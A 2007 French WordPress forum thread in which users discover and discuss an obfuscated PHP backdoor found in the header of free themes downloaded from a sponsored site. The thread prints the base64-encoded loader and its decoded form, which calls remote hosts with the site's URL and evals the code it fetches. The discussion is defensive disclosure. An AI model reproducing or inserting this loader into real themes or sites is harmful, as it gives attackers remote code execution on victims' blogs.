Vous n'êtes pas identifié.
Annonce
Annonce 1 : Le Codex en français a besoin de vous pour avancer !
Annonce 2 : Avant de poster, n'oubliez pas de faire une petite Recherche et de lire les règles de ce forum.
Annonce 3 : Lisez notre blog, il regorge de bonnes informations.
Annonce 4 : Rejoignez-nous sur Facebook et sur Twitter
#1 26-11-2007 13:12:28
- romsi
- Membre WP
- Date d'inscription: 26-11-2007
- Messages: 4
Hacks dans les thèmes Wordpress ?
Bonjour,
j'ai téléchargé quelques thèmes (notamment peaceful rush) sur des sites apparaissant sur les liens sponsorisés de google sur la recherche "thèmes wordpress" et voici ce que je trouve dans la source de l'entete :
Code:
- eval(base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7'));
en d'autres termes :
Code:
- if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr"; elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc"; else $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2"; @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;'); if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) { $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1"; $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']); $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115); @eval($R3E33E017CD76B9B7E6C7364FB91E2E90); } else { $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0"; $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']); @readfile($R6E4F14B335243BE656C65E3ED9E1B115); } fclose($R37C014DAE5FE4FE5C77B6735ABC30916);
que signifie www.$R50F5F9C80F12FFAE8B2400528E81B34E.com ?
on en parle ici aussi
Dernière modification par romsi (26-11-2007 13:13:48)
Hors ligne
#2 26-11-2007 14:23:30
- dlo
- Maître WP
- Date d'inscription: 10-04-2007
- Messages: 1906
Re: Hacks dans les thèmes Wordpress ?
Il y a une bonne explication (en anglais) du contenu de ce code sur ce site. Pour résumer, ce code est potentiellement dangereux car il pourrait conduire à faire exécuter n'importe quel instruction sur votre blog.
Conclusion : N'utiliser ce thème sous aucun prétexte !
Cordialement
Non, je ne suis pas blogodépendant... C'est juste que je n'ai toujours pas trouvé la sortie de ce forum !
Hors ligne
#3 26-11-2007 14:25:09
- romsi
- Membre WP
- Date d'inscription: 26-11-2007
- Messages: 4
Re: Hacks dans les thèmes Wordpress ?
Ou avoir enlevé le code, ce qui est mon cas, mais il faut bien vérifier chaque fichier..
Hors ligne
#4 26-11-2007 14:28:48
Re: Hacks dans les thèmes Wordpress ?
Code:
- $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc"; else $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2";
> que signifie www.$R50F5F9C80F12FFAE8B2400528E81B34E.com ?
Ca doit donner un truc comme:
www.wpsnc.com ou www.wpsnc2.com
A première vue, le code fait une requête vers un de ces serveurs en donnant l'URL du site qui l'utilise.
Un petit spyware ?
C'est un thème payant ?
Si ça le fait à chaque requête, les temps de réponse de ton site doivent en prendre un coup...
Mon conseil: A eviter...
Faites un blog, un wiki... mais pas un forum!
Micro Web Agency (mon agence web) | LH Citizen-Web (mon blog) | The WordPress Experience
Hors ligne
#6 26-11-2007 14:37:02
- romsi
- Membre WP
- Date d'inscription: 26-11-2007
- Messages: 4
Re: Hacks dans les thèmes Wordpress ?
c'était un thème gratuit proposé sur ce site : http://www.wpsphere.com/6.html (le code est dans le header)
nota : il est aussi proposé sur wordpress (http://themes.wordpress.net/columns/2-c … l-rush-10/), sans le bout de code.. donc ça ne vient probablement pas de l'auteur..
après avoir testé un autre thème du premier site cité, j'ai retrouvé encore ce code dans le header.. il faut ptet faire qq chose ?
c'est le premier lien sponsorisé sur "themes wordpress"
Dernière modification par romsi (26-11-2007 14:37:34)
Hors ligne
#7 26-11-2007 14:52:44
- dlo
- Maître WP
- Date d'inscription: 10-04-2007
- Messages: 1906
Re: Hacks dans les thèmes Wordpress ?
romsi a écrit:
après avoir testé un autre thème du premier site cité, j'ai retrouvé encore ce code dans le header.. il faut ptet faire qq chose ?
Il est toujours possible de demander à l'auteur du thème ce qu'il en est exactement. Il pourra clarifier la situation, s'il le désire.
Cordialement
Non, je ne suis pas blogodépendant... C'est juste que je n'ai toujours pas trouvé la sortie de ce forum !
Hors ligne
#8 26-11-2007 15:23:45
Re: Hacks dans les thèmes Wordpress ?
Après une petite vérification (test de 5 thèmes) les thèmes proposés par le site http://www.wpsphere.com semblent tous poser ce probleme.
Donc a éviter....
Hors ligne
#9 26-11-2007 15:30:51
Re: Hacks dans les thèmes Wordpress ?
En tout cas merci de l'info et bravo pour ta vigilence, d'autres moins doué se seraient laissés prendre.
Une fois de plus prudence et donc téléchargement des thèmes sur WP ou dont les auteurs sont connus de WP( participation au forum, créateur de plugins etc) .... dommage pour les créateurs ne proposant leur thème que via leur site/blog
Version:WP 2.9(NA!) ~ Hébergeur:123.fr ~ Theme: Perso
~ Plugins: une dizaineHors ligne
#10 26-11-2007 16:56:17
- romsi
- Membre WP
- Date d'inscription: 26-11-2007
- Messages: 4
Re: Hacks dans les thèmes Wordpress ?
yep, le tout étant de diffuser le message, et il serait ptet bon d'en faire un message d'avertissement sur le front de wordpress.org car d'autres ont des données plus sensibles que moi sur WP..
Hors ligne
